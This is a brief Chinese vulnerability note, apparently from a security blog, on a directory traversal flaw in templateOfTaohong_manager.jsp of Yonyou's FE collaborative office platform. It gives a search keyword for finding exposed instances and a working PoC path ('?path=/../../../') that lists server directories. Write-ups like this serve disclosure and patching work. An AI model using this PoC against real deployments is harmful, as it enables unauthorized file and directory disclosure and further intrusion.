用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞

漏洞描述

用友 FE协作办公平台 templateOfTaohong_manager.jsp文件存在目录遍历漏洞,通过漏洞攻击者可以获取目录文件等信息,导致进一步攻击。

漏洞影响

用友 FE协作办公平台

网络测绘

“FE协作”

漏洞复现

登录页面

20231206101719924-1646059676433-1560cc0a-f228-4969-862e-6c1bca531f9b.390ce86d_2023-12-06_10-16-49 (1)

验证POC

/system/mediafile/templateOfTaohong_manager.jsp?path=/../../../

20231206101852585-1646059728922-422586b0-6e56-4752-832e-4f386629fd2e.d40430d7_2023-12-06_10-18-11 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容